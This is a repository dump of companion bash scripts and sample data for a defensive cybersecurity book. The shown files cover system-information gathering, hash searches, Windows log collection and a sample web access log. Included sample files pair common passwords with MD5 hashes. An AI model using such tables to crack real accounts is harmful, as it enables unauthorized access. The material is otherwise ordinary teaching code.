Repository: cybersecurityops/cyber-ops-with-bash
Branch: master
Commit: 84ccf91092e1
Files: 71
Total size: 123.7 KB
Directory structure:
gitextract_c6os0si7/
├── LICENSE
├── ch03/
│ ├── echoparams.sh
│ └── osdetect.sh
├── ch04/
│ └── frost.txt
├── ch05/
│ ├── cmds.txt
│ ├── cutfile.txt
│ ├── getlocal.sh
│ ├── hashsearch.sh
│ ├── typesearch.sh
│ └── winlogs.sh
├── ch06/
│ ├── accesstime.txt
│ ├── awkusers.txt
│ ├── book.json
│ ├── book.xml
│ ├── csvex.txt
│ ├── ips.txt
│ ├── passwords.txt
│ ├── procowner.txt
│ ├── tasks.txt
│ ├── user.txt
│ └── usernames.txt
├── ch07/
│ ├── access.log
│ ├── countem.awk
│ ├── countem.sh
│ ├── histogram.sh
│ ├── histogram_plain.sh
│ ├── pagereq.awk
│ ├── pagereq.sh
│ ├── summer.sh
│ ├── useragents.sh
│ └── useragents.txt
├── ch08/
│ ├── livebar.sh
│ ├── looper.sh
│ ├── tailcount.sh
│ └── wintail.sh
├── ch09/
│ ├── autoscan.sh
│ ├── fd2.sh
│ └── scan.sh
├── ch10/
│ └── baseline.sh
├── ch11/
│ ├── Calc_VT.txt
│ ├── WannaCry_VT.txt
│ ├── helloworld.c
│ ├── vtjson.awk
│ └── vtjson.sh
├── ch12/
│ ├── tagit.sh
│ ├── webdash.sh
│ └── weblogfmt.sh
├── ch13/
│ ├── bannergrabber.sh
│ └── smtpconnect.sh
├── ch14/
│ ├── askey.sh
│ ├── innerscript.sh
│ ├── logfuscate.sh
│ ├── oneline.sh
│ ├── readable.sh
│ ├── streamcipher.sh
│ ├── synfuscate.sh
│ └── wrapper.sh
├── ch15/
│ ├── fuzzer.sh
│ └── fuzzme.c
├── ch16/
│ ├── LocalRat.sh
│ └── RemoteRat.sh
├── ch19/
│ └── pingmonitor.sh
├── ch20/
│ └── softinv.sh
├── ch21/
│ ├── test.input
│ └── validateconfig.sh
├── ch22/
│ ├── checkemail.1liner
│ ├── checkemail.sh
│ ├── checkemailAlt.sh
│ ├── checkpass.sh
│ └── emailbatch.sh
└── readme.txt
================================================
FILE CONTENTS
================================================
================================================
FILE: LICENSE
================================================
MIT License
Copyright (c) 2019 Cybersecurity Ops with bash
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
================================================
FILE: ch03/echoparams.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# echoparams.sh
#
# Description:
# Demonstrates accessing parameters in bash
#
# Usage:
# ./echoparms.sh <param 1> <param 2> <param 3>
#
echo $#
echo $0
echo $1
echo $2
echo $3
================================================
FILE: ch03/osdetect.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# osdetect.sh
#
# Description:
# Distinguish between MS-Windows/Linux/MacOS
#
# Usage: bash osdetect.sh
# output will be one of: Linux MSWin macOS
#
if type -t wevtutil &> /dev/null # <1>
then
OS=MSWin
elif type -t scutil &> /dev/null # <2>
then
OS=macOS
else
OS=Linux
fi
echo $OS
================================================
FILE: ch04/frost.txt
================================================
1 Two roads diverged in a yellow wood,
2 And sorry I could not travel both
3 And be one traveler, long I stood
4 And looked down one as far as I could
5 To where it bent in the undergrowth;
6
7 Excerpt from The Road Not Taken by Robert Frost
================================================
FILE: ch05/cmds.txt
================================================
#Linux Command |MSWin Bash |XML tag |Purpose
#----------------+------------+-----------+------------------------------
uname -a |uname -a |uname |O.S. version etc
cat /proc/cpuinfo|systeminfo |sysinfo |system hardware and related info
ifconfig |ipconfig |nwinterface|Network interface information
ip route |route print |nwroute |routing table
arp -a |arp -a |nwarp |ARP table
netstat -a |netstat -a |netstat |network connections
mount |net share |diskinfo |mounted disks
ps -e |tasklist |processes |running processes
================================================
FILE: ch05/cutfile.txt
================================================
12/05/2017 192.168.10.14 test.html
12/30/2017 192.168.10.185 login.html
================================================
FILE: ch05/getlocal.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# getlocal.sh
#
# Description:
# Gathers general system information and dumps it to a file
#
# Usage:
# bash getlocal.sh < cmds.txt
# cmds.txt is a file with list of commands to run
#
# SepCmds - separate the commands from the line of input
function SepCmds()
{
LCMD=${ALINE%%|*} # <11>
REST=${ALINE#*|} # <12>
WCMD=${REST%%|*} # <13>
REST=${REST#*|}
TAG=${REST%%|*} # <14>
if [[ $OSTYPE == "MSWin" ]]
then
CMD="$WCMD"
else
CMD="$LCMD"
fi
}
function DumpInfo ()
{ # <5>
printf '<systeminfo host="%s" type="%s"' "$HOSTNAME" "$OSTYPE"
printf ' date="%s" time="%s">\n' "$(date '+%F')" "$(date '+%T')"
readarray CMDS # <6>
for ALINE in "${CMDS[@]}" # <7>
do
# ignore comments
if [[ ${ALINE:0:1} == '#' ]] ; then continue ; fi # <8>
SepCmds
if [[ ${CMD:0:3} == N/A ]] # <9>
then
continue
else
printf "<%s>\n" $TAG # <10>
$CMD
printf "</%s>\n" $TAG
fi
done
printf "</systeminfo>\n"
}
OSTYPE=$(./osdetect.sh) # <1>
HOSTNM=$(hostname) # <2>
TMPFILE="${HOSTNM}.info" # <3>
# gather the info into the tmp file; errors, too
DumpInfo > $TMPFILE 2>&1 # <4>
================================================
FILE: ch05/hashsearch.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# hashsearch.sh
#
# Description:
# Recursively search a given directory for a file that
# matches a given SHA-1 hash
#
# Usage:
# hashsearch.sh <hash> <directory>
# hash - SHA-1 hash value to file to find
# directory - Top directory to start search
#
HASH=$1
DIR=${2:-.} # default is here, cwd
# convert pathname into an absolute path
function mkabspath () # <6>
{
if [[ $1 == /* ]] # <7>
then
ABS=$1
else
ABS="$PWD/$1" # <8>
fi
}
find $DIR -type f | # <1>
while read fn
do
THISONE=$(sha1sum "$fn") # <2>
THISONE=${THISONE%% *} # <3>
if [[ $THISONE == $HASH ]]
then
mkabspath "$fn" # <4>
echo $ABS # <5>
fi
done
================================================
FILE: ch05/typesearch.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# typesearch.sh
#
# Description:
# Search the file system for a given file type. It prints out the
# pathname when found.
#
# Usage:
# typesearch.sh [-c dir] [-i] [-R|r] <pattern> <path>
# -c Copy files found to dir
# -i Ignore case
# -R|r Recursively search subdirectories
# <pattern> File type pattern to search for
# <path> Path to start search
#
DEEPORNOT="-maxdepth 1" # just the current dir; default
# PARSE option arguments:
while getopts 'c:irR' opt; do # <1>
case "${opt}" in # <2>
c) # copy found files to specified directory
COPY=YES
DESTDIR="$OPTARG" # <3>
;;
i) # ignore u/l case differences in search
CASEMATCH='-i'
;;
[Rr]) # recursive # <4>
unset DEEPORNOT;; # <5>
*) # unknown/unsupported option # <6>
# error mesg will come from getopts, so just exit
exit 2 ;;
esac
done
shift $((OPTIND - 1)) # <7>
PATTERN=${1:-PDF document} # <8>
STARTDIR=${2:-.} # by default start here
find $STARTDIR $DEEPORNOT -type f | while read FN # <9>
do
file $FN | egrep -q $CASEMATCH "$PATTERN" # <10>
if (( $? == 0 )) # found one # <11>
then
echo $FN
if [[ $COPY ]] # <12>
then
cp -p $FN $DESTDIR # <13>
fi
fi
done
================================================
FILE: ch05/winlogs.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# winlogs.sh
#
# Description:
# Gather copies of Windows log files
#
# Usage:
# winlogs.sh [-z] [dir]
# -z Tar and zip the output
# dir Optional scratch directory for holding the log files
TGZ=0
if (( $# > 0 )) # <1>
then
if [[ ${1:0:2} == '-z' ]] # <2>
then
TGZ=1 # tgz flag to tar/zip the log files
shift
fi
fi
SYSNAM=$(hostname)
LOGDIR=${1:-/tmp/${SYSNAM}_logs} # <3>
mkdir -p $LOGDIR # <4>
cd ${LOGDIR} || exit -2
wevtutil el | while read ALOG # <5>
do
ALOG="${ALOG%$'\r'}" # <6>
echo "${ALOG}:" # <7>
SAFNAM="${ALOG// /_}" # <8>
SAFNAM="${SAFNAM//\//-}"
wevtutil epl "$ALOG" "${SYSNAM}_${SAFNAM}.evtx"
done
if (( TGZ == 1 )) # <9>
then
tar -czvf ${SYSNAM}_logs.tgz *.evtx # <10>
fi
================================================
FILE: ch06/accesstime.txt
================================================
0745,file1.txt,1
0830,file4.txt,2
0830,file5.txt,3
================================================
FILE: ch06/awkusers.txt
================================================
Mike Jones
John Smith
Kathy Jones
Jane Kennedy
Tim Scott
================================================
FILE: ch06/book.json
================================================
{ <1>
"title": "Cybersecurity Ops with bash", <2>
"edition": 1,
"authors": [ <3>
{
"firstName": "Paul",
"lastName": "Troncone"
},
{
"firstName": "Carl",
"lastName": "Albing"
}
]
}
================================================
FILE: ch06/book.xml
================================================
<book title="Cybersecurity Ops with bash" edition="1"> <1>
<author> <2>
<firstName>Paul</firstName> <3>
<lastName>Troncone</lastName>
</author> <4>
<author>
<firstName>Carl</firstName>
<lastName>Albing</lastName>
</author>
</book>
================================================
FILE: ch06/csvex.txt
================================================
"name","username","phone","password hash"
"John Smith","jsmith","555-555-1212",5f4dcc3b5aa765d61d8327deb882cf99
"Jane Smith","jnsmith","555-555-1234",e10adc3949ba59abbe56e057f20f883e
"Bill Jones","bjones","555-555-6789",d8578edf8458ce06fbc5bb76a58c5ca4
================================================
FILE: ch06/ips.txt
================================================
ip,OS
10.0.4.2,Windows 8
10.0.4.35,Ubuntu 16
10.0.4.107,macOS
10.0.4.145,macOS
================================================
FILE: ch06/passwords.txt
================================================
password,md5hash
123456,e10adc3949ba59abbe56e057f20f883e
password,5f4dcc3b5aa765d61d8327deb882cf99
welcome,40be4e59b9a2a2b5dffb918c0e86b3d7
ninja,3899dcbab79f92af727c2190bbd8abc5
abc123,e99a18c428cb38d5f260853678922e03
123456789,25f9e794323b453885f5181f1b624d0b
12345678,25d55ad283aa400af464c76d713c07ad
sunshine,0571749e2ac330a7455809c6b0e7af90
princess,8afa847f50a716e64932d995c8e7435a
qwerty,d8578edf8458ce06fbc5bb76a58c5c
================================================
FILE: ch06/procowner.txt
================================================
Process Owner;PID
jdoe;0
tjones;4
jsmith;340
msmith;528
================================================
FILE: ch06/tasks.txt
================================================
Image Name;PID;Session Name;Session#;Mem Usage
System Idle Process;0;Services;0;4 K
System;4;Services;0;2,140 K
smss.exe;340;Services;0;1,060 K
csrss.exe;528;Services;0;4,756 K
================================================
FILE: ch06/user.txt
================================================
user,ip
jdoe,10.0.4.2
jsmith,10.0.4.35
msmith,10.0.4.107
tjones,10.0.4.145
================================================
FILE: ch06/usernames.txt
================================================
1,jdoe
2,puser
3,jsmith
================================================
FILE: ch07/access.log
================================================
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET / HTTP/1.1" 200 2377 "-" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /backblue.gif HTTP/1.1" 200 4529 "http://192.168.0.35/" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /fade.gif HTTP/1.1" 200 1112 "http://192.168.0.35/" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /favicon.ico HTTP/1.1" 404 503 "-" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /index.html HTTP/1.1" 200 6933 "-" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /favicon.ico HTTP/1.1" 404 504 "-" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3413 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1429 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] "GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1" 200 7835 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] "GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1" 200 81377 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] "GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1" 200 19526 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] "GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1" 200 42818 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] "GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1" 200 47030 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /about.html HTTP/1.1" 200 7042 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3414 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1430 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /uploads/2/9/1/4/29147191/page-layouts-4078890_orig.jpg HTTP/1.1" 200 265418 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19445 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/GW-bridge.html HTTP/1.1" 200 5011 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] "GET /consulting.html HTTP/1.1" 200 7269 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1430 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3414 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] "GET /uploads/2/9/1/4/29147191/398980_orig.png HTTP/1.1" 200 120188 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19445 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:54:11 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Colaboration.html HTTP/1.1" 200 5011 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET / HTTP/1.1" 200 2377 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /backblue.gif HTTP/1.1" 200 4529 "http://192.168.0.35/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /fade.gif HTTP/1.1" 200 1113 "http://192.168.0.35/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /favicon.ico HTTP/1.1" 404 503 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /index.html HTTP/1.1" 200 6932 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3414 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1430 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1" 200 7835 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1" 200 81377 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1" 200 19525 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1" 200 47029 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1" 200 42819 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:30 -0500] "GET /support.html HTTP/1.1" 200 6207 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:30 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/support.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:31 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1" 200 5011 "http://192.168.0.35/support.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:39 -0500] "GET /request-quote.html HTTP/1.1" 200 7326 "http://192.168.0.35/support.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:39 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/request-quote.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:39 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Colaboration.html HTTP/1.1" 200 5011 "http://192.168.0.35/request-quote.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:39 -0500] "GET /files/theme/images/select-arrowaf0e.png?1509483497 HTTP/1.1" 200 1386 "http://192.168.0.35/files/main_styleaf0e.css?1509483497" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /products.html HTTP/1.1" 200 7158 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /uploads/2/9/1/4/29147191/253922682aa.png?162 HTTP/1.1" 200 16602 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /uploads/2/9/1/4/29147191/99480889766.png?165 HTTP/1.1" 200 26428 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /uploads/2/9/1/4/29147191/32981bd4c.png?161 HTTP/1.1" 200 38062 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3414 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1430 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19445 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:56:53 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1" 200 5011 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /resources.html HTTP/1.1" 200 7569 "http://192.168.0.35/request-quote.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /uploads/2/9/1/4/29147191/identity_orig.png HTTP/1.1" 200 47804 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /uploads/2/9/1/4/29147191/editor/078519-blue-jelly-icon-business-envelope5ca13.png?1492225862 HTTP/1.1" 200 7769 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /uploads/2/9/1/4/29147191/428026.png HTTP/1.1" 200 20174 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /uploads/2/9/1/4/29147191/principlesofcyber_orig.png HTTP/1.1" 200 43725 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /uploads/2/9/1/4/29147191/principlesofencryption-nb_orig.png HTTP/1.1" 200 45954 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1" 200 5011 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:57:15 -0500] "GET /uploads/2/9/1/4/29147191/protecting_your_identity.pdf HTTP/1.1" 200 775340 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.26 - - [12/Nov/2017:16:16:01 -0500] "GET / HTTP/1.1" 200 2377 "-" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
